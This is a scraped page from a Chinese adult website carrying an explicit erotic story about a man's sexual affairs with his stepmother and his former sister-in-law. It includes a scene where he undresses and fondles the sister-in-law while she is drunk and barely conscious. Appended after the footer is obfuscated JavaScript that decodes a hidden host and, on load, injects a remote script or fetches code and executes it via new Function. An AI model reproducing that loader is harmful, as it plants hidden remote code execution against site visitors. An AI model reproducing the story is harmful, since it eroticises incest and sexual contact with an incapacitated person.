返回

继母、大嫂b64

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

南台湾的夏天,天气非常炎热,星期六下午庄志扬开着货车在省公路上,心中想着这二个月来,不知道是犯什么冲,为何人生竟然是如此之难。丧父,相交四年的女朋友离他而去,哥哥因受不了丧父之痛,也或许是深具佛缘而远走西藏参透人生。

庄志扬25岁,168cm,与时下年轻人没有两样,有差别的是他必须比别人更早承受人生种种苦难。在省公路驰骋的志扬,强忍着悲痛愤怒,不知不觉已泪流满面。志扬心中想着,老天爷怎如此残忍的考验他,让他如此手足无措,如此孤立无援。脑海中突然闪过他继母沉兰馨美丽脸庞和动人身材,庄志扬边开车边擦干眼泪想着,这世上还有这唯一没有血缘关系的亲人,与他相依为命,顿时心中轻松不少,开着想着...,客户到了。

  而在同一时间,沉兰馨从午觉中惊醒。沉兰馨33岁,165cm,三围35 -25-35是五年前嫁给志扬的爸爸,如今由秘书也接管了亡夫的扬承五金公司 。

  沉兰馨靠在床头回想着梦中情境,为何这阵子如此频繁的梦到志扬的爸爸呢? 为何常常梦到和志扬在床上赤裸裸的缠绵温存,而每次在志扬肉棒要插入她小穴中 ,总是惊醒呢?志扬的爸爸梦中告诉她,要她好好照顾志扬,要像母亲一样照顾志 扬,要像妻子一样服伺志扬,而接着就是志扬和她在梦境中赤裸裸抚摸着,彼此亲 吻着。沉兰馨感到她的下体已湿淋淋,三角裤已被自己的淫水浸湿一大半,只得起 床往浴室去冲凉,换掉已沁湿的三角裤。

  浴室中,沉兰馨用莲蓬头冲着身体,边冲边想着志扬在梦境中那坚挺火热的肉 棒,不知在现实生活中是否如此火热坚挺,前夫肉棒似乎没有如此火热坚挺,沉兰 馨目前为止只跟前夫做爱过,她想着只有海绵体的肉棒可如此坚挺火热吗?梦境中 她又为何是清爽的短发呢?沉兰馨抚摸自己的美乳,丰臀,小穴.....,突然 脑海中闪过一件事情,对了!前夫梦境中交代必须准备一牛皮纸信封,作为她和志 扬间一些难以启齿的问题沟通管道。沉兰馨想着:她必须在志扬下班前把东西准备 好,于是冲凉后,穿上轻便衣服便出门去了。

  晚饭后客厅沙发上,兰馨正面对电视机手靠在沙发扶手上看着电视,志扬则坐 在旁边单人沙发看着报纸,志扬被兰馨裙下风光深深吸引,不时眼光飘向兰馨大腿 根上若隐若现的白色三角裤上,光滑滑嫩的大腿皮肤,白色三角裤的稍凹陷处,志 扬心猿意马幻想着,志扬肉棒已慢慢变大撑在牛仔裤上。兰馨感到有一灼人眼神正 搜寻她的窄裙下,技巧性把眼睛看上志扬的下体处,发觉志扬牛仔裤已被肉棒撑得 涨鼓鼓,兰馨知道志扬交往四年的女友不久前背叛他,而向一年轻小白脸投怀送抱 ,志扬深受打击,这阵子似乎闷闷不乐,不再像以前偶尔靠着她向她撒娇着。

  兰馨心想着,微微挪动臀部技巧性把大腿微微张开,让志扬欣赏着自己裙下春 光,兰馨满意着她竟能让志扬冲动着,兰馨感到空气中有一喘息气息正蔓延着,尽 管它是如此不露痕迹,但兰馨可感觉到它的存在。兰馨被志扬贪婪眼神探索着,兰 馨感到下体燥热,只怕淫水会晕了三角裤,起身说:志扬,阿姨去冲个凉,待会去 逛逛夜市,好不好。志扬猛然回神说:好...好。志扬看着兰馨走入房间,志扬 眼睛看着兰馨那裙子上三角裤的痕迹。志扬也回到房间准备冲凉。刚进房间却看到 书桌上有一牛皮信封.....。

  信封上有一鲜红唇印,志扬打开信封,里面有一香水信纸写着:

  亲爱的志扬:

  阿姨见你这两个月来闷闷不乐,心中好舍不得;阿姨又怕跟你面对面谈论着, 你会尴尬或者不愿意讲,所以阿姨只能用信封和你沟通着,只要你愿意,任何话题 ,心中任何委屈,阿姨都愿倾听着,阿姨和你现在相依为命,只想更了解你,更关 心你,彼此间有更亲密的感觉,阿姨希望你能透过这牛皮信封和阿姨沟通着。好吗 ?信封上信纸上的唇印,是阿姨的唇印,这是阿姨诚意,希望志扬可感觉到。

  爱你的兰馨阿姨上

  志扬冲凉后走出客厅,见阿姨穿着淡黄色紧身无袖上衣,胸前微露白皙酥胸, 迷人乳沟吸引着志扬眼光,配紧身牛仔裤,有清爽感觉。志扬说:阿姨好漂亮喔!

  兰馨微笑说:谢谢志扬的赞美,志扬喜欢就好。

  志扬接着说:阿姨,对不起,让你担心了,志扬会好好藉信封沟通让阿姨不用 担心。

  兰馨高兴抱着志扬说:好孩子,阿姨好高兴,好高兴。

  兰馨和志扬拥抱着,兰馨感到自己蜜壶花园被一坚挺东西顶着,兰馨脸红心跳 轻轻推开说:志扬,去逛夜市了。

  志扬捉挟说:好啊!志扬和美丽阿姨逛夜市去了。志扬牵着兰馨的玉手往屋外 走去,兰馨震了一下,随志扬走出去。

  在宁静的夜里,沉兰馨又从梦中惊醒着,她坐靠着床头闭着双眼,回想着梦中 如真如幻的情节,梦中志扬温柔的抚摸她美丽玉体,舔吻她全身,沉兰馨随着梦境 中的情形,不自主用手轻轻抚摸自己丰满坚挺乳房,感到自己乳头已经变硬了,嗯 ..哼..嗯.....志扬....,当她舒服着眯着眼担心往房门看时,却发 现地板上有牛皮信封。沉兰馨兴奋着的去拿起信封,回到床上靠在床头看着,信封 上她唇印旁画着一麦当劳符号,沉兰馨思索着为何志扬画麦当劳符号是什么意思呢 ?沉兰馨拿出信纸看。

  兰馨,志扬让你担心了,志扬只是想不通,我那前女朋友长的酷似你,志扬一 直认为她会如同兰馨温柔贤淑,但没想到长的像,个性差别上是如此之大,一切都 过去了,从今而后我不再对她有任何留恋。兰馨,信封上那麦当劳符号,是一俯视 图,猜猜看,兰馨如此善解人意,如此美丽动人,志扬真的喜欢你,甚至.... .。

  爱你的志扬上

  兰馨想着志扬信中含意,兰馨一遍一遍看着,发觉信中竟没一句阿姨用语,麦 当劳符号,甚至....。志扬打哑谜,不明说。兰馨心中似有结论,但却是如此 模糊,不确定。兰馨唯一可确定是志扬喜欢她,这就足够让她好高兴了,对她而言 志扬似有一股吸引力,或许对所有女人吧!

  几天下来,信封上不只麦当劳符号,也多了兰馨公司的产品---伞行沙轮头 ,也有一朵香菇。

  志扬信纸上更露骨的挑逗兰馨,兰馨此时已然了解,原来麦当劳符号,伞行沙 轮头,香菇是志扬龟头的隐喻,兰馨脸红心跳,兰馨从没想到志扬虽善良努力,对 女人却是如此具侵略性,毫不作做,却让她不感厌恶。兰馨想着彼此间关系的变化 ,她并不是一位淫荡女人,为何对志扬却如此放在心上呢?莫非打从一开始,她就 喜欢上志扬呢?

  梦中情境是亡夫托梦,还是自己日有所思,夜有所梦呢?兰馨想着,突然脑中 一闪,短发,梦中与志扬缠绵时,自己是清爽短发,难道冥冥中有着安排呢?

  又是周末了,因为兰馨公司是周休二日,但志扬今天还是要上班,志扬在一油 漆总代理商上班。餐桌上,兰馨对着志扬说:志扬,今天下班早一点回来,帮阿姨 挂一幅画,好吗?

  志扬说:当然好啊!帮美女做事,是一大享受。

  兰馨被志扬挑逗着脸红心跳,羞赧着低下头。

  志扬走到兰馨后面抱着她说:阿姨脸红了!

  兰馨说:你又不乖了。

  志扬从后抱着兰馨说:人家才没有呢?人家疼阿姨。

  兰馨站起来转身说:上班快迟到了,不要在撒娇了。

  兰馨话刚说完,志扬温热双唇立刻贴上兰馨火红双唇,兰馨睁大眼睛看着志扬 ,志扬抱住她吻着她,兰馨惊吓着,随即闭上眼睛,享受如梦中的缠绵,志扬双手 抚摸着兰馨背部,丰臀。

  兰馨酥软靠着志扬,彼此间发出重重喘息声,嗯...嗯.....,志扬双 手慢慢用力,用坚挺肉棒磨蹭着兰馨蜜壶花园,双手也深入宽松运动裤中,抚摸兰 馨结实滑嫩的丰臀,慢慢由丰臀转前,隔着兰馨三角裤,用手指撩拨着蜜壶花园。

  兰馨呻吟着,嗯.....嗯....

  志扬感到兰馨已湿了,轻轻推开兰馨说:兰馨不乖,都湿了。

  兰馨含情脉脉羞赧说:都是..志扬啦!志扬才不乖。

  志扬接着说:兰馨不乖,舒服到湿了,都还克制自己,不敢叫出来。

  兰馨头低着说:人家才没有呢?

  志扬说:我去上班了。

  客厅中留下满脸红晕,轻轻喘息着的兰馨,兰馨回味着志扬的温柔,还有那坚 挺的感觉...。

  兰馨下午去剪了清爽短发,穿了一件连身紧身窄裙。

  志扬下班回来后,一见兰馨说:阿姨,你好漂亮喔!

  接着就抱住兰馨在脸上轻轻吻了一下。

  志扬说:走,挂画去。

  房间内,志扬拿起电钻,水平尺,铁锤,忙了一阵,已经汗水淋漓,于是脱了 上衣,只穿一件运动短裤。志扬爬上铝梯,正在挂画时,突见扶助铝梯的兰馨脸正 在他的短裤前,似乎迷惘着那志扬的气味。志扬顺势着偶尔用肉棒点在兰馨脸上, 肉棒苏醒着,慢慢变大。兰馨脸上感觉肉棒越来越大,越来越硬,兰馨不知志扬故 意的,只因兰馨脑中已空白了,如果有的话,就是志扬的肉棒。

  挂好画,志扬下铝梯时,兰馨才猛然回神,脸上红晕着。

  志扬从后抱着兰馨说:兰馨,你怎么感谢我帮你挂画呢?

  兰馨羞赧说:阿姨...煮丰盛晚餐请你吃。

  志扬说:人家才不要呢?煮东西给志扬吃,那是阿姨应该作的。

  说完便吻上兰馨耳朵,兰馨震了一下轻哼一下,嗯..,志扬边吻边舔着兰馨 耳朵,白皙脖颈,滑嫩肩膀,双手抚摸着兰馨美丽身体,诱人身材。

  兰馨全身蠕动着,手轻轻抚摸着志扬强壮手臂,啊.....志扬....啊 ..不要.....不...啊.....。

  志扬双手隔着兰馨紧身连身窄裙,抚摸兰馨饱满的乳房,志扬呻吟说:喔!兰 馨....喔...乳房好柔软....好大..啊....好好摸喔..... ,志扬拉下兰馨肩带,左手托住乳房,右手用手指轻轻抚摸兰馨美乳,时而在乳头 周围轻轻绕圆着,轻抚着乳头。

  兰馨全身酥软蠕动着,呼吸越来越重,喘息呻吟着,啊.....志扬..喔 .....好舒服....嗯...啊...。

  志扬让兰馨靠在书桌旁,弯下腰舔含着兰馨乳房,用舌头舔着已硬挺的乳头, 手不时在丰满乳房和兰馨大腿内侧轻轻撩拨着,兰馨脑中一片空白呻吟着,啊.. ...坏孩子....舒服..啊....好舒服...喔...啊.....。

  志扬见兰馨兴奋喘息着,手已伸入兰馨内裤中,抚摸兰馨阴唇,撩拨浓密阴毛 。兰馨浪穴早已湿淋淋了,志扬边抚摸边把兰馨带往床铺上,轻轻放躺下兰馨,把 兰馨白色三角裤拉下,手上已用湿了的中指,绕圆抚摸阴蒂,兰馨心醉了,兰馨沉 迷在志扬抚摸下,兰馨疯狂了,呻吟着,啊....志扬....好舒服...好 舒服..不行了....啊...啊.....。

  志扬用中指插入那小浪穴中,志扬仿佛感到小浪穴有股吸力,把中指滑滑吸入 。兰馨嘴巴张开,皱着眉头,闭起眼,啊....啊...,志扬慢慢用中指慢慢 抽插着泉涌而出的小浪穴,拇指按抚着阴蒂。兰馨怎经得起志扬如此温柔的调情爱 抚,啊...啊..志扬.....好舒服.....兰馨....快....丢 了...啊....啊...。

  志扬感觉到兰馨小浪穴收缩着,呼吸也越来越急促,志扬加速抽动中指,且志 扬呻吟着:喔....兰馨...啊.....舒服.....你淫水好多... .好多....啊...。

  兰馨双手抱住志扬脖子,啊...受不了...我...啊....泄了.. .啊.....。

  只见兰馨挺腰数秒钟,颤抖着几下,躺在志扬结实胸膛上重重喘息着,丰满乳 房随着喘息声起伏着,慢慢平缓着.....。

  兰馨慢慢回神时感到小浪穴涨痛着,睁眼看时,志扬正用坚挺火热的大鸡巴正 硬挤入小浪穴中,啊...痛....啊..慢....啊....,志扬只能用 暗红龟头磨蹭着小穴,阴唇,阴蒂,慢慢的旋转而入,旋转而出。兰馨小浪穴被龟 头棱角刮得好舒服,好舒服,啊.....啊....,待凶巴巴的大鸡巴一分分 挤入小浪穴,兰馨疯狂叫喊着,痛...舒服....啊...好舒服...,志 扬用力一顶,全根尽没,兰馨张大嘴,啊.....,志扬慢慢抽插着,时深时浅 ,时而旋转,兰馨似乎着魔似的喊叫,啊....志扬老公...啊....好棒 ...亲哥哥...舒服....喔...啊哼...啊哼...

  啊...

  我又泄了....啊.....,志扬继续抽插着小浪穴,发出扑滋...扑 滋.....声音,兰馨淫水不听使唤被硬梆梆鸡巴掏出,啊....受不了.. ..受不了...不要...啊.....又丢了.....啊....,兰馨不 知泄了多少次,最后筋疲力竭了,志扬见兰馨舒服了,不忍心再继续,只好拔出凶 巴巴的大鸡巴,大鸡巴跳动着。   兰馨真的好舒服,从来不知做爱如此欢愉,头脑晕晕的一片空白,只觉似乎到 天堂了,那种感觉无法形容,不知过了多久回过神,睁开眼睛见到志扬正抚摸她身 上每一吋肌肤,眼睛专注欣赏她美丽身体,动人曲线。

  兰馨羞赧说:志扬...谢谢你,阿姨好舒服。

  志扬嘟着嘴说:不是阿姨,是馨妹。

  兰馨脸庞更红说:老公,馨妹好舒服,馨妹谢谢老公,亲哥哥。

  志扬接着说:人家还没泄,馨妹要负责。

  兰馨见大鸡巴硬梆梆跳动着说:志扬,弟弟好大,好粗喔!比你爸大好多,粗 好多,难怪现在小浪穴还痛痛,馨妹受不了了,怎么办呢?

  志扬向下轻按着兰馨的头往跳动的大鸡巴,兰馨有默契的用手慢慢套动着大鸡 巴,口中含住龟头,慢慢舔着含着,用舌头在阴茎上下舔着,且含住那阴囊睾丸吸 吮着,志扬呻吟着,啊.....好会舔...喔...好舒服...啊.... .。

  兰馨不时向志扬飘着抚媚眼神,鼻子嗯...嗯....呻吟着,志扬面目扭 曲呻吟着,兰馨好有成就感,感到大鸡巴涨得大大的,嘴里充满着,大鸡巴跳动着 ,兰馨加速套动着大鸡巴,口中吞吐出大鸡巴,挑逗说着:喔!.....志扬. .鸡巴好大喔...好粗...喔...好硬...好烫.....舒服吗... ..啊.....好棒.....。

  志扬嘴张得大大喘息着着,啊....快....快....快出来了..啊 .....啊.....。兰馨口含住火热暗红龟头,手快速套动大鸡巴,鼻子嗯 ...嗯...嗯..,一波波精液喷射入口,龟头跳动着,志扬舒服了.... .。

  志扬舒服抚摸着兰馨秀发说:兰馨,嫁给我好吗?

  兰馨说:馨妹不能嫁给哥哥,名份上我是你阿姨,是你爸的妻子,只要志扬心 中有馨妹就好,馨妹是你阿姨,是你妻子,是你馨妹,馨妹会好好照顾你,服伺你 。

  志扬说:那不是委屈妈妈你呢?

  兰馨高兴说:你叫我妈妈,我好高兴。妈妈是志扬哥的妈妈,妈妈是志扬哥的 情人,志扬哥也是妈妈的小情人。

  志扬问:妈妈!舒服吗?

  兰馨红着脸羞赧说:妈妈好舒服,高潮好多次,你比你爸爸强好多,又温柔, 又凶猛,妈妈这辈子从没有如此舒服过,谢谢小老公。

  志扬说:妈,你刚刚好淫荡喔!

  我好喜欢喔!

  兰馨低下头说:人家这辈子只对哥哥淫荡,只有哥哥能让人家淫荡,馨妹喜欢 你爱你。难道你不了解馨妹吗?馨妹不是一个淫荡的女人。

  志扬说:人家又没说馨妹淫荡见一个爱一个,妈妈最好了,只对志扬荡... 。

  天刚亮时,兰馨醒来欣赏志扬赤裸裸的身体,见志扬弟弟软软躺着,心中想着 :弟弟好厉害喔!弟弟好可爱喔!青筋暴怒时硬梆梆凶巴巴火热着,如今软绵绵。 坚挺时比梦中还硬,还粗,使我好舒服。兰馨见志扬沉沉睡着,不忍去破坏志扬睡 梦,更何况自己小穴还痛着,于是起身穿衣去煮早餐了。

  兰馨穿着衬衫,下半身只穿件白色三角裤,煮完菜,正熬着粥。志扬穿着内裤 赤裸上身走向厨房从后抱住兰馨,兰馨吓一跳说:老公不乖!起床不穿衣服,待会 感冒了。

  志扬的手伸入衬衫抚摸着兰馨丰满乳房,喔.....好大..好柔软喔.. ..摸起来好舒服...。

  兰馨身躯蠕动说:老公一早就不乖,啊...不要..待会又湿了....啊 ...。

  志扬微笑说:湿了才好,老公就能让馨妹舒服。

  兰馨只能拉志扬到餐桌椅子上坐着说:先吃早餐,否则不理你,不疼你喔!

  志扬只能坐着等着。兰馨端粥到餐桌上,志扬说:吃热粥怎么只有这些菜呢?

  兰馨说:太多吃不完。

  志扬说:馨妹,你没听过吗?吃热粥,伤重菜;娶美某,伤重尪婿。你看爸爸 就是因为娶到水某,才英年早逝。

  兰馨脸色红晕羞赧说:老公你好坏喔!欺负人家,更何况是娶美某,多活数十 冬。

  志扬苦着脸向兰馨说:弟弟又不乖了!

  兰馨看志扬内裤撑起大帐棚说:老公,你先吃饭,弟弟不乖,让姐姐好好修理 它。说完便小心翼翼拉出硬梆梆的大鸡巴,用手套动着,用舌头舔着,用口含着, 志扬边吃早餐边享受着兰馨的服务。

  志扬晚餐后看着电视,而兰馨舔含着志扬坚挺大鸡巴,就在此时志扬手机响起 ,于是志扬接起手机,而兰馨嗯.....嗯....舔含着大鸡巴。

  志扬说:好.....

  我立刻过去...嗯.....好.....。

  挂掉手机,兰馨问:谁打电话来!志扬说:大嫂雯雯,说有重要事情要和我谈。

  兰馨说:那快点去!有事打电话回来,早点回来喔!

  志扬说:我知道,但人家.....现在想要嘛!

  兰馨说:不行,乖,先去看看有什么事,回来再让你舒舒服服的玩。

  志扬嘟着嘴说:好嘛!   志扬整理衣服裤子就出门了.....。

  雯雯是志扬的大嫂,27岁,156cm,虽然身高不高,却是麻雀虽小,五 脏俱全,该丰满的丰满,该小的小,可以说是小一号的美人胚子,和志扬的大哥结 婚两年,没有生子,因志扬大哥笃性佛法,又因丧父之痛,所以和雯雯离婚,远走 西藏参透人生。雯雯正是兰馨公司的员工。

  志扬按了公寓门铃,开门正是雯雯,摇摇晃晃似乎饮了不少酒。

  志扬搀着雯雯坐在沙发上说:大嫂,你怎么喝酒呢?你不是不会喝酒吗?

  雯雯醉眼迷离说:心情不好,你....大哥....去西藏....我寂寞 ....。

  志扬说:大哥,对不起你,但关心你还有很多人啊!

  雯雯说:志扬.....你关心我吗?.....你知道你大哥...去西藏 后...我...梦中.....想着是你.....你知道吗?

  志扬知道雯雯醉了,胡言乱语了。

  志扬说:大嫂,你醉了。

  雯雯说:我没有醉,吼.....。

  雯雯吐了一身都是。志扬只能抱起雯雯往浴室去,放了温水。

  志扬心中想着:只要心中没杂念,就百无禁忌。

  志扬把雯雯T-shirt,短裤,胸罩,三角裤全脱了,冲水,用肥皂洗着 雯雯身体,志扬洗着洗着,大鸡巴已青筋暴怒着,雯雯丰满乳房,粉红色乳头,乳 晕小小的,皮肤光滑细嫩,蜜壶花园小小的,茂盛阴毛。

  志扬禁不住在乳房,花园,大腿,丰臀多抚摸几下,志扬看到雯雯乳头变大坚 挺着,雯雯睁眼又似乎睁不开似的,嗯.....嗯.....,志扬才回神,擦 干雯雯身体,抱回房间。志扬找着雯雯的三角裤,志扬故意找着唯一一件透明丁字 裤,帮雯雯穿上,而不穿胸罩。再穿上一件白色细肩带短睡衣。志扬帮着洗净所吐 之衣物,整理客厅,把垃圾装好。在回房间见雯雯已沉沉入睡,见化妆台有一唇膏 ,于是拿起唇膏在雯雯肚皮上画上Hello kitty和一只螃蟹。拿起笔写 了一张字条放在化妆台上,拿起垃圾关了门,便回家了。   志扬回到家,刚开启房间门,见兰馨穿着一件透明黑色睡衣而没有穿内衣内裤 躺靠着床头,抚媚诱惑着看着他,志扬从雯雯处回来,大鸡巴早已撑着好难过,脱 了衣服裤子赤裸裸扑上床,手抚摸上蜜壶花园,早已湿潺潺,大鸡巴熟练着进入小 浪穴中,志扬虽急躁,但却缓缓把大鸡巴送入送出,龟头棱角刮着阴道细肉,啊. ....喔.....老公怎么...喔...好大.....啊哼.....舒 服...好粗....受不了...泄了..啊.....。

  兰馨一波波的高潮,火热的大肉棒,龟头的棱角分明,志扬的抽插,不仅深入 兰馨的骨头筋路血液中,连兰馨的灵魂也能感受那酥软快感,啊....老公.. .快泄...啊.....快泄了,志扬拉住兰馨双臂,兰馨双腿缠住志扬腰部, 志扬凶猛冲撞着,快速撞击着,啊....啊.....泄了...啊..... 。

  彼此紧紧抱着,彼此重重喘息着,彼此感觉到心跳猛烈跳动着,大鸡巴喷射跳 动着,小浪穴湿淋淋收缩着,志扬和兰馨都舒服满足了。

  雯雯醒来时,头痛痛,想着昨晚情形,似乎自己喝酒失态了,好像志扬有帮她 洗澡,她后悔懊恼着,看自己穿着睡衣,看化妆台上有一纸条,拿起纸条看着:

  雯雯大嫂:

  以后如果再喝那么多酒,志扬就不理你了,不疼你了,不爱你了。你昨晚吐了 一身,志扬帮你清理干净了,也帮你换上你最迷人诱惑的睡衣和透明三角裤,雯雯 你身材好好喔!皮肤更是滑嫩细致,丰满坚挺乳房,细腰丰臀,害我欲火焚身难过 死了,只能在你肚皮上画上图案,以后再喝如此多酒就不理你了,今天我晚上七点 会去找你,好好在家等我喔!

  关心你爱你的志扬上

  雯雯羞得满面通红,掀开睡衣看肚皮上有Hello kitty和螃蟹,又 看到唯一的透明丁字裤,雯雯恨不得钻到地里去,全身被志扬看光光,全身被志扬 抚摸光光,她就是Hello kitty,志扬就是螃蟹,雯雯自言自语说:酒 ,真是误事。不过雯雯心里却甜甜的,因为她喜欢志扬,反复看着纸条,蜜壶湿湿 的,冲凉上班了..。

  雯雯下班后洗澡后,穿着一连身裙,等着志扬,叮咚...叮咚...,雯雯 开门见志扬,羞赧脸红低着头。

  没想到志扬牵着她说:来,去洗澡去。

  雯雯满脸通红说:人家洗完澡了。

  志扬说:跟你开玩笑,兰馨在楼下等我们看MTV。

  雯雯说:你好讨厌喔!欺负人家。

  志扬说:才没有,昨晚我帮你洗的多仔细啊!洗的香香的。

  雯雯被志扬挑逗着无法招架,说:快下去,兰馨在楼下等。挽着志扬下楼去。

  MTV包厢中,兰馨见雯雯对志扬如此亲密,女人直觉知道雯雯爱上志扬,兰 馨想着如何让他们独处,更要引起她们心中欲火,让他们情不自禁。兰馨心中盘算 着,刚好片子完了。

  兰馨说:你们再看一部,我去找个朋友,我到柜台帮你们挑一部好看片子。

  兰馨跟志扬使眼色,志扬苦笑着。

  雯雯当然想跟志扬独处着连说:好啊!

  兰馨到柜台找了叔嫂情欲。兰馨就回家了。

  不知情的志扬和雯雯在昏暗包厢中,看着东洋剧情,哥哥因出海打鱼,船翻了 死了。由于叔嫂本来感情不错,相处久了,嫂嫂孤枕难眠,便穿极尽诱惑睡衣,挑 逗小叔,小叔年轻气盛,终于在一台风天晚上,彼此疯狂做爱,疯狂叫喊着。

  志扬和雯雯随着剧情心情起伏着,听到荧幕上呻吟声,啊...啊..... 啊哼..啊哼.....。

  志扬抚摸雯雯大腿,雯雯闭起眼听着荧幕呻吟声,全身颤抖着,手按在志扬手 上,志扬的手却自由自在游移着,摸上雯雯内裤,志扬用手指撩拨着,由三角裤旁 深入,抚摸着已湿透的小浪穴,志扬吻舔含着雯雯耳朵,雯雯受不了的,啊... .啊...嗯.....。

  志扬把雯雯的手带往早已拿出的凶巴巴的大鸡巴,雯雯被那火热坚挺粗壮的大 鸡巴震慑住,雯雯小穴正被志扬手指抽插着,心想着:好粗壮,好火热,好坚挺的 大鸡巴啊!

  雯雯用手套动着大鸡巴,过一会儿,雯雯已无法思考了,啊.....快.. .嗯...好舒服...啊哼....啊哼..啊.....丢了...啊... ..,雯雯高潮了,握住大鸡巴,舒服趴上志扬腿上,大鸡巴正在脸颊上,雯雯喘 息着,大鸡巴跳动着敲着雯雯脸颊,雯雯脸颊上感受大鸡巴火热及跳动。雯雯回神 后,贪婪舔含着大鸡巴,嗯.....嗯...好粗大...嗯.....嗯.. ..。

  志扬抚摸着雯雯秀发说:雯雯上来吧!

  雯雯说:好粗壮,我怕受不了,我怕....。

  志扬说:慢慢来,没关系。

  志扬让雯雯背对自己,而让雯雯看着电视。雯雯慢慢坐下,志扬抚摸雯雯阴蒂 ,雯雯:啊....好涨...好饱满.....痛..啊....喔....嗯 ....,好不容易借着湿潺潺的淫水才勉勉强强全根尽没,雯雯小浪穴被大鸡巴 塞着满满着,花心被龟头挤压着,雯雯只能张着嘴,皱着眉闭起眼,啊..... 啊....。志扬用手按助雯雯细腰,上下慢慢套动着,龟头棱角慢慢刮着小穴细 肉,雯雯受不了....啊..好舒服....志扬....哥哥...我受不了 ,我受....不了....泄了.....啊....高潮....啊哼... ..啊...啊....。

  雯雯躺在志扬身上,重重喘息着。

  志扬挺腰抽插着,雯雯怎受得了志扬挺腰抽插,雯雯怎受得了,志扬旋转着她 的腰部,雯雯又泄了....啊....,雯雯虚脱了,雯雯神游太虚了,雯雯满 足了这阵子的空虚,雯雯已舒服到听不到荧幕上的呻吟声,这种感觉让雯雯觉得人 生是彩色的,雯雯不知过多久,回神了,电视已完了,起身想拿出大鸡巴,啊.. ...,亲哥哥你没泄啊!好厉害喔!火热坚挺的大鸡巴离开小浪穴跳动着。

  雯雯说:志扬,今晚陪我,好吗?

  志扬说:我有什么好处呢?

  雯雯说:雯雯满足你所有好处,只要你陪我,疼我。

  志扬说:决不食言。雯雯说:决不食言。当整理好衣服,雯雯走一步就软脚了 .....。

评分
相关推荐
3.0分

3.0分 继母616

3.0分

3.0分 大方的嫂嫂7f4

3.0分

3.0分 大嫂1f4

3.0分

3.0分 我的继母947

3.0分

3.0分 继母的诱惑e8b

3.0分

3.0分 后母与继子4bc

3.0分

3.0分 诱人的继母297

3.0分

3.0分 好友的继母288

3.0分

3.0分 继母的帮助ae7

3.0分

3.0分 好友的继母288


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};